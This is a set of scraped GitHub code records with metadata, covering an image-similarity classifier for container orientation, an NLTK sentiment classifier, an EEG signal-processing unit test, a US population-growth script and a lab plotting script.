'sokalsneath',\n 'sqeuclidean', 'wminkowski', 'yule']\n if metric not in metric_list:\n metric = 'cosine'\n\n try:\n out1 = out1.cpu()\n except:\n out1 = out1\n\n try:\n out2 = out2.cpu()\n except:\n out2 = out2\n cosineDistance = distance.cdist(out1, out2, metric)[0]\n return cosineDistance\n\n def compare_cosine_all(self, out1, out2):\n metric = 'cosine'\n out1 = out1.cpu()\n out2 = out2.cpu()\n cosineDistance = distance.cdist(out1, out2, metric)\n return cosineDistance\n\n\n def get_similar_img(self, img1, metric = \"\"):\n '''\n to get similar image\n :param img1:\n :return:\n '''\n if self.debug:\n cv2.putText(img1, \"INPUT\", (0, img1.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3, (200, 200, 0), 3)\n cv2.imshow(\"1\", img1)\n # imgasvar = self.preprocess_image(img1)\n outputs1 = self.get_fc_feature(img1)\n # print(\"outputs1\", outputs1)\n self.plot_probablity(outputs1)\n # print(\"outputs1\", outputs1)\n result = []\n for j, name in enumerate(self.names_result.keys()):\n dis = self.compare_cosine(outputs1, self.names_result[name],metric = metric)\n result.append(dis[0])\n dis_all = 
self.compare_cosine(outputs1, self.names_result[name],metric = metric )\n print(name, \"dis_all: \", dis_all)\n\n result_array = np.asarray(result)\n ind = np.argmin(result_array)\n print(self.names_ref)\n print(ind)\n try:\n class_obj = self.names_ref[ind].split(\"_\")[0]\n except:\n class_obj = self.names_ref[ind]\n print(\"The class is {}\".format(class_obj))\n # print(os.path.join(self.folder_ref, self.names_ref[ind]))\n answer = cv2.imread(os.path.join(self.folder_ref, self.names_ref[ind]))\n if self.debug:\n cv2.putText(answer, \"ANSWER {}\".format(str(class_obj)), (0, answer.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3.5, (50, 0, 200), 3)\n cv2.imshow(\"answer_class\", answer)\n cv2.waitKey(0)\n\n return class_obj\n\n\n def get_similar_n_img(self, img1, metric = \"\", get_n_imge = 5):\n '''\n to get similar image\n :param img1:\n :return:\n '''\n if self.debug:\n cv2.putText(img1, \"INPUT\", (0, img1.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3, (200, 200, 0), 3)\n cv2.imshow(\"1\", img1)\n # imgasvar = self.preprocess_image(img1)\n outputs1 = self.get_fc_feature(img1)\n # print(\"outputs1\", outputs1)\n self.plot_probablity(outputs1)\n # print(\"outputs1\", outputs1)\n result = []\n for j, name in enumerate(self.names_result.keys()):\n dis = self.compare_cosine(outputs1, self.names_result[name],metric = metric)\n result.append(dis[0])\n dis_all = self.compare_cosine(outputs1, self.names_result[name],metric = metric )\n print(name, \"dis_all: \", dis_all)\n\n result_array = np.asarray(result)\n\n n_result = []\n n_ind_result = []\n\n for n_result_index in range(get_n_imge):\n\n ind = np.argmin(result_array)\n n_ind_result.append(ind)\n\n try:\n n_result.append(self.names_ref[ind].split(\"_\")[0])\n except:\n n_result.append(self.names_ref[ind])\n\n result_array[ind] = 999\n\n print(\"The class is {}\".format(n_result[-1]))\n # print(os.path.join(self.folder_ref, self.names_ref[ind]))\n answer = cv2.imread(os.path.join(self.folder_ref, self.names_ref[n_ind_result[0]]))\n if self.debug:\n cv2.putText(answer, \"ANSWER {}\".format(str(n_result[-1])), (0, answer.shape[0] - 10), cv2.FONT_HERSHEY_COMPLEX, 3.5, (50, 0, 200), 3)\n cv2.imshow(\"answer_class\", answer)\n cv2.waitKey(0)\n\n return n_result\n\n\n\nif __name__ == '__main__':\n folder = \"F:\\Pawat\\Projects\\Imageprocessing_Vistools\\data\\container\\image\\Darker - Exposure time 120000us close some ambient light\"\n folder = \"F:\\Ph.D\\circle_classification\\Images_all_class\\\\0_all_class\"\n folder = \"dataset\\class_registeration\"\n folder = \"dataset\\\\20230311\"\n folder_ref = \"F:\\Pawat\\Projects\\Imageprocessing_Vistools\\data\\container\\\\light2_class\"\n folder_ref = \"F:\\Ph.D\\circle_classification\\Images_all_class\\\\0_all_class_aug\"\n folder_ref = \"dataset\\class_registeration\"\n folder_ref = \"dataset\\\\20230311\"\n\n names = os.listdir(folder)\n names_ref = os.listdir(folder_ref)\n i = 0\n j = 0\n\n\n ### fill the other object\n # orientation_detection_A = OrientationDetection( path=os.path.join(folder, names[i]), json_path=\"config/notch_config_A.json\")\n # ## EX\n # orientation_detection_B = OrientationDetection( path=os.path.join(folder, names[i]), json_path=\"config/notch_config_B.json\")\n\n\n\n def resize_scale(img, scale=0.3):\n resize = cv2.resize(img, (int(img.shape[1] * scale), int(img.shape[0] * scale)))\n return resize\n\n def test_model_and_acc(model = \"\" ,metric = \"\", crop_circle = []):\n fea_path = f\"config/features_result_{model}.json\"\n featureVis = FeatureVisualization(model = 
model, features_path= fea_path)\n        all_result = []\n        cv2.namedWindow(\"1\",cv2.WINDOW_NORMAL)\n        cv2.namedWindow(\"answer_class\",cv2.WINDOW_NORMAL)\n        val_result = []\n        for i in range(len(names)):\n            result = []\n            img1 = cv2.imread(os.path.join(folder, names[i]))\n            img1 = preprocess(img1, featureVis.circle_platfrom)\n            # img1 = preprocess(img1, orientation_detection_A.crop_circle_platform)\n            # img1 = cv2.rotate(img1,cv2.ROTATE_90_COUNTERCLOCKWISE)\n            name_class = featureVis.get_similar_img(img1, metric= metric)\n            name_classes = featureVis.get_similar_n_img(img1, metric = metric , get_n_imge=5)\n            print(name_classes)\n            if name_class in names[i]:\n                val_result.append(True)\n            else:\n                val_result.append(False)\n            all_result.append(result)\n        count_true = val_result.count(True)\n        acc = (count_true / len(val_result)) * 100\n        print(str(acc) + \"% accuracy\")\n        return acc\n\n    def test_an_image(img, model = None):\n\n        fea_path = f\"config/features_result_{model}.json\"\n        featureVis = FeatureVisualization(model = model, features_path= fea_path)\n\n        if isinstance(img, str):\n            img1 = cv2.imread(img)\n        else:\n            img1 = img\n        img1 = preprocess(img1, featureVis.circle_platfrom)\n        name_classes = featureVis.get_similar_n_img(img1, metric=metric, get_n_imge= 5)\n\n        print(name_classes)\n\n    modelnames = [\"mobilenet_v2\", \"densenet121\", \"densenet201\", \"resnext50_32x4d\",\n                  \"vgg19\", \"alexnet\", \"squeezenet1_1\", \"mnasnet1_0\"]\n    ''' metric = 'braycurtis', 'canberra', 'chebyshev', 'cityblock', 'correlation',\n    'cosine', 'dice', 'euclidean', 'hamming', 'jaccard', 'jensenshannon',\n    'kulsinski', 'mahalanobis', 'matching', 'minkowski', 'rogerstanimoto',\n    'russellrao', 'seuclidean', 'sokalmichener', 'sokalsneath',\n    'sqeuclidean', 'wminkowski', 'yule'.'''\n    metric = \"cosine\"\n    metrics = [\"cosine\", \"euclidean\",'sqeuclidean','seuclidean','matching']\n\n    model_result = {}\n    featureVis = FeatureVisualization(features_path=\"config/features_result.json\")\n    model_result[\"dataset\"] = featureVis.folder_ref\n\n\n    with open(\"config/classification.json\", \"r\") as file:\n        json_data_classification = file.read()\n    model_result[\"config\"] = json.loads(json_data_classification)\n\n\n    print(model_result)\n    for metric in metrics:\n        for modelname in modelnames:\n            print(\"model: \", modelname)\n            acc = test_model_and_acc(model = modelname, metric = metric)\n            model_result[modelname] = acc\n\n    print(model_result)\n\n\n\n    with open(f\"model_result_{metric}.json\", \"w\") as file:\n        json.dump(model_result, file)\n    print(\"Saved model results successfully\")\n\n", "repo_name": "PudPawat/container-orientation-detection", "sub_path": "compareimg_val.py", "file_name": "compareimg_val.py", "file_ext": "py", "file_size_in_byte": 17777, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.resize", "line_number": 31, "usage_type": "call"}, {"api_name": "lib.warp_and_reverse_warp.warp_polar", "line_number": 33, "usage_type": "call"}, {"api_name": "lib.warp_and_reverse_warp.reverse_warp", "line_number": 34, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}, {"api_name": "easydict.EasyDict", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.models.vgg16", "line_number": 68, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 
68, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 70, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 70, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenet_v2", "line_number": 72, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 72, "usage_type": "name"}, {"api_name": "torchvision.models.mobilenet_v2", "line_number": 73, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 73, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 76, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 76, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 77, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 77, "usage_type": "name"}, {"api_name": "torchvision.models.densenet201", "line_number": 80, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 80, "usage_type": "name"}, {"api_name": "torchvision.models.densenet201", "line_number": 81, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 81, "usage_type": "name"}, {"api_name": "torchvision.models.resnext50_32x4d", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.models.resnext50_32x4d", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 85, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 88, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 88, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 89, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 89, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 92, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 92, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 93, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 93, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_1", "line_number": 96, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 96, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_1", "line_number": 97, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 97, "usage_type": "name"}, {"api_name": "torchvision.models.mnasnet1_0", "line_number": 100, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 100, "usage_type": "name"}, {"api_name": "torchvision.models.mnasnet1_0", "line_number": 101, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 101, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 106, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 106, "usage_type": "name"}, {"api_name": "torchvision.models.vgg16", "line_number": 108, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 111, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 115, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 124, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.ascontiguousarray", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.ndarray.tolist", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 223, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 238, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 272, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 272, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 279, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 279, "usage_type": "name"}, {"api_name": "cv2.putText", "line_number": 290, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 290, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 304, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 305, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 316, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 316, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 317, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 318, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 330, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 330, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 344, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 351, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 363, "usage_type": "call"}, {"api_name": "os.path", "line_number": 363, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 365, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_COMPLEX", "line_number": 365, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 366, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 367, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 383, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 384, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 397, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 404, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 404, "usage_type": "attribute"}, {"api_name": "cv2.namedWindow", "line_number": 405, "usage_type": "call"}, {"api_name": "cv2.WINDOW_NORMAL", "line_number": 405, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path", "line_number": 409, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 432, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 457, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 472, "usage_type": "call"}]}
{"seq_id": "39839285953", "text": "import re\nimport csv\nimport random\nfrom statistics import mode\n\nimport nltk\nimport numpy as np\nfrom flask import Flask, request\nfrom nltk import SklearnClassifier\nfrom nltk.corpus import movie_reviews\nfrom nltk.tokenize import word_tokenize\nfrom sklearn.model_selection import KFold\nfrom sklearn.svm import LinearSVC\nfrom nltk.metrics.scores import (precision, recall)\nfrom nltk import collections\nimport pickle\n\napp = Flask(__name__)\n\npickle_model = \"LinearSVC_classifier.pickle\"\npickle_word_features = \"word_features.pickle\"\nclassifier = None\nword_features = []\nword_features_2gram = []\n\ndef get_ngrams(text, n):\n    n_grams = nltk.ngrams(word_tokenize(text), n)\n    return [' '.join(grams) for grams in n_grams]\n\ndef calc_model():\n    global word_features, classifier, word_features_2gram\n    # documents = [(list(movie_reviews.words(fileid)), category)\n    #              for category in movie_reviews.categories()\n    #              for fileid in movie_reviews.fileids(category)]\n\n    documents = []\n    documents2gram = []\n\n    with open(\"positive.txt\", 'r') as csv_file:\n        pos = 1\n        for record in csv_file:\n            documents.append((word_tokenize(record), pos))\n            # sixgrams = get_ngrams(record, 2)\n            # documents2gram.append((get_ngrams(record, 2), pos))\n\n    with open(\"negative.txt\", 'r') as csv_file:\n        for record in csv_file:\n            documents.append((word_tokenize(record), 0))\n\n            # documents2gram.append((get_ngrams(record, 2), 0))\n\n\n    random.shuffle(documents)\n    # random.shuffle(documents2gram)\n\n    all_words = []\n    for lst in documents:\n        for w in lst[0]:\n            all_words.append(w.lower())\n\n    # all_words_2gram = []\n    # for lst in documents2gram:\n    #     for w in lst[0]:\n    #         all_words_2gram.append(w.lower())\n\n    all_words = nltk.FreqDist(all_words)\n    print(\"getting features\")\n    word_features = list(all_words.keys())[:5000]\n\n    # all_words_2gram = nltk.FreqDist(all_words_2gram)\n    # print(\"getting features\")\n    # word_features_2gram = list(all_words_2gram.keys())[:5000]\n\n    save_pickle(pickle_word_features, word_features)\n    print(\"saved word features\")\n\n    print(\"setting features per tweet\")\n    feature_sets = [(find_features(rev), category) for (rev, category) in documents]\n    # feature_sets_2gram = [(find_features(rev), category) for (rev, category) in documents2gram]\n\n\n\n    k = 10\n    cv = KFold(k)\n    accur = []\n    i = 0\n\n    testing_set = feature_sets[1900:] #+ feature_sets_2gram[1900:]\n    training_set = feature_sets[:1900] #+ feature_sets_2gram[:1900]\n\n    linear_svc_classifier = SklearnClassifier(LinearSVC())\n    # classifier = nltk.NaiveBayesClassifier.train(training_set)\n    classifier = linear_svc_classifier.train(training_set)\n    accur.insert(i, nltk.classify.util.accuracy(classifier, testing_set))\n\n\n    
print('LinearSVC_classifier average accuracy:', sum(accur) / len(accur))\n\n # save_pickle(pickle_model, classifier)\n\n\ndef sentiment(text):\n feats = find_features(word_tokenize(text))\n votes = []\n v = classifier.classify(feats)\n votes.append(v)\n # feats = find_features2gram(get_ngrams(text, 2))\n # v = classifier.classify(feats)\n # votes.append(v)\n return mode(votes)\n\n\ndef find_features(tweet):\n global word_features\n words = set(tweet)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\ndef find_features2gram(tweet):\n global word_features_2gram\n words = set(tweet)\n features = {}\n for w in word_features_2gram:\n features[w] = (w in words)\n\n return features\n\n\ndef save_pickle(filename, what_to_save):\n file = open(filename, \"wb\")\n pickle.dump(what_to_save, file)\n file.close()\n\n\ndef load_pickle(filename):\n return pickle.load(open(filename, 'rb'))\n\n\n\nif __name__ == '__main__':\n calc_model()\n # classifier = load_pickle(pickle_model)\n print(sentiment(\"This movie was awesome! The acting was great, plot was wonderful, and there were pythons...so yea!\"))\n print(sentiment(\"This movie was utter junk. There were absolutely 0 pythons. I don't see what the point was at all. Horrible movie, 0/10\"))\n\n # num_row = 0\n with open('news_texts.txt', encoding=\"utf8\") as content_file:\n head = content_file.readline()\n print(sentiment(head))\n content = content_file.readline()\n print(sentiment(content))\n\n print(sentiment(\"Trump to hit Mexico with tariffs in anti-immigration measure\"))\n\n # app.run(debug=True)\n", "repo_name": "shiraez/PPL_Final", "sub_path": "Nltk/no_pickle.py", "file_name": "no_pickle.py", "file_ext": "py", "file_size_in_byte": 4531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "nltk.ngrams", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 27, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 42, "usage_type": "call"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 48, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 53, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 66, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 84, "usage_type": "call"}, {"api_name": "nltk.SklearnClassifier", "line_number": 91, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 91, "usage_type": "call"}, {"api_name": "nltk.classify.util.accuracy", "line_number": 94, "usage_type": "call"}, {"api_name": "nltk.classify", "line_number": 94, "usage_type": "attribute"}, {"api_name": "nltk.tokenize.word_tokenize", "line_number": 103, "usage_type": "call"}, {"api_name": "statistics.mode", "line_number": 110, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 134, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "20077233151", "text": "'''\nCreated on 10.05.2016\n\n@author: Paul Pasler\n'''\nimport sys, os\nimport unittest\n\nfrom numpy import NaN, isnan, count_nonzero, copy, array\nfrom numpy.testing.utils import assert_allclose\n\nfrom config.config import ConfigProvider\nfrom eeg_processor import SignalProcessor\nfrom util.quality_util import QualityUtil\n\n\nsys.path.append(os.path.join(os.path.dirname(__file__), 
'..'))\n\n\n\ndef sameEntries(list1, list2):\n if len(list1) != len(list2):\n return False\n\n return all([x in list1 for x in list2])\n\n#TODO make this flexible to config values change\nclass TestSimpleChain(unittest.TestCase):\n\n def setUp(self):\n self.chain = SignalProcessor()\n self.qualUtil = QualityUtil()\n config = ConfigProvider().getProcessingConfig()\n self.upperBound = config.get(\"upperBound\")\n self.lowerBound = config.get(\"lowerBound\")\n self.minQuality = config.get(\"minQual\")\n self.maxNaNValues = config.get(\"maxNaNValues\")\n\n def _checkValidData(self, data, invalid):\n self.assertEqual(invalid, self.maxNaNValues < count_nonzero(isnan(data)))\n\n def test_process_sunshine(self):\n data = [-2.0, -1.0, 0, 1.0, 2.0]\n qual = [15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [-1.0, -0.5, 0, 0.5, 1])\n\n def test_process_badQuality(self):\n data = [-2.0, -1.0, 0, 1.0, 2.0]\n qual = [15, 0, self.minQuality-1, self.minQuality, self.minQuality+1]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [-1.0, NaN, NaN, 0.5, 1])\n\n def test_process_replaceSequences(self):\n data = [1.0, 1.0, 1.0, 1.0, 1.0, 2.0, 4.0]\n qual = [15, 15,15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n assert_allclose(proc, [NaN, NaN, NaN, NaN, NaN, 0.5, 1.0])\n\n def test_process_replaceOutliners(self):\n data = [-5000, self.lowerBound-1, self.lowerBound, self.lowerBound+1, self.upperBound-1, self.upperBound, self.upperBound+1, 5000]\n qual = [15, 15, 15, 15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n self.assertEquals(count_nonzero(isnan(proc)), 4)\n\n def test_process_allTogether(self):\n data = [3.0, 1.0, 1.0, 1.0, 1.0, 1.0, self.lowerBound-1, self.upperBound+1, -8, -4.0, 2.0, 4.0]\n cp = copy(data[:])\n qual = [self.minQuality-1, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15, 15]\n\n proc, invalidData = self.chain.process(data, qual)\n self._checkValidData(proc, invalidData)\n #make sure we work on copies only\n assert_allclose(cp, data)\n assert_allclose(proc, [NaN, NaN, NaN, NaN, NaN, NaN, NaN, NaN, -1.0, -0.5, 0.25, 0.5])\n\n def test_checkValid(self):\n maxNaNValues = self.maxNaNValues\n for length in range(0, maxNaNValues+1):\n data = self._getNaNList(length)\n qual = [15]*length\n _, invalidData = self.chain.process(data, qual)\n self.assertFalse(invalidData, \"length %d\" % length)\n \n for length in range(maxNaNValues+1, maxNaNValues+5):\n data = self._getNaNList(length)\n qual = [15]*length\n _, invalidData = self.chain.process(data, qual)\n self.assertTrue(invalidData, \"length %d\" % length)\n\n def _getNaNList(self, length):\n return array([NaN]*length)\n\n\nif __name__ == \"__main__\":\n unittest.main()", "repo_name": "zjucsxxd/current-adas", "sub_path": "project/code/src/test/chain_test.py", "file_name": "chain_test.py", "file_ext": "py", "file_size_in_byte": 3645, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.dirname", 
"line_number": 17, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 28, "usage_type": "attribute"}, {"api_name": "eeg_processor.SignalProcessor", "line_number": 31, "usage_type": "call"}, {"api_name": "util.quality_util.QualityUtil", "line_number": 32, "usage_type": "call"}, {"api_name": "config.config", "line_number": 33, "usage_type": "name"}, {"api_name": "config.config.ConfigProvider", "line_number": 33, "usage_type": "call"}, {"api_name": "config.config.get", "line_number": 34, "usage_type": "call"}, {"api_name": "config.config", "line_number": 34, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 35, "usage_type": "call"}, {"api_name": "config.config", "line_number": 35, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 36, "usage_type": "call"}, {"api_name": "config.config", "line_number": 36, "usage_type": "name"}, {"api_name": "config.config.get", "line_number": 37, "usage_type": "call"}, {"api_name": "config.config", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 64, "usage_type": "name"}, {"api_name": "numpy.count_nonzero", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.testing.utils.assert_allclose", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 83, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.NaN", "line_number": 100, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "15487426028", "text": "import json\n\nimport requests\n\nyearWiseDataList = []\npercentRise = []\nyears = []\nresponse_API = requests.get('https://datausa.io/api/data?drilldowns=Nation&measures=Population')\nassert response_API.status_code == 200\n\ndata = response_API.text\n\npopulationData = json.loads(data)\nnumOfYears = (len(populationData['data']))\nidNation = populationData['data'][0]['ID Nation']\nnation = populationData['data'][0]['Nation']\nfor index in range(0, numOfYears):\n yearWiseDataList.append(populationData['data'][index]['Population'])\n years.append(populationData['data'][index]['Year'])\nyearWiseDataList = yearWiseDataList[::-1]\nyears = years[::-1]\n\nfor index in range(1, len(yearWiseDataList)):\n rise = yearWiseDataList[index] - yearWiseDataList[index - 1]\n percentRise.append((rise * 100) / yearWiseDataList[index - 1])\nprint(percentRise)\n\nprint((percentRise.index(max(percentRise))) + 1)\n\nmaxRiseYear = years[(percentRise.index(max(percentRise))) + 1]\nminRiseYear = years[(percentRise.index(min(percentRise))) + 1]\nprint('According to', idNation, 'in ', numOfYears, ' years from ', years[0], ' to', years[len(years) - 1],\n ' peak population was ', max(percentRise), '% in ', maxRiseYear, ' and 
lowest population increase was ',\n min(percentRise), '% in ', minRiseYear, '.')\n", "repo_name": "Siddhesh23/pythonProject", "sub_path": "Tests/APITest.py", "file_name": "APITest.py", "file_ext": "py", "file_size_in_byte": 1285, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "28530383479", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.optimize import curve_fit\r\nimport C01_aufg_a as C01\r\n\r\nprint(\"Hier entsteht Plot 1\")\r\nfig, (ax1,ax2) = plt.subplots(2,1,constrained_layout=True, sharex=True)\r\n\r\nx_plot = np.linspace(0, 10)\r\nax1.plot(C01.t, C01.U + C01.U_inf,'x', label=\"U(t)\") # t in ms\r\n#ax1.plot(x_plot, U_fit(x_plot, *params ))\r\n#ax1.set_yscale(\"log\")\r\nax1.set_xlabel(\"$t / \\\\unit{{\\\\milli\\\\s}}$\")\r\nax1.set_ylabel(\"$ \\\\left( U - U \\\\left(\\\\infty \\\\right) \\\\right)/ \\\\unit{{\\\\volt}}$\")\r\n\r\nax1.grid()\r\n\r\n\r\n\r\nax2.plot(C01.t, C01.U_pos, 'x')\r\nax2.plot(x_plot, C01.params[0]*x_plot+ C01.params[1], label=\"lineare Regression\")\r\nax2.set_xlabel(\"$t / \\\\unit{{\\\\milli\\\\s}}$\")\r\nax2.set_ylabel(\"$\\ln\\\\left(U / U\\\\left(\\\\infty \\\\right)\\\\right)$\")\r\nax2.grid()\r\nfig.legend()\r\n\r\nplt.savefig(\"build/C01_aufg_a.pdf\")", "repo_name": "Enno-Enno/PraktikumWS2223", "sub_path": "05_v353/C01a_aufg_a_plot.py", "file_name": 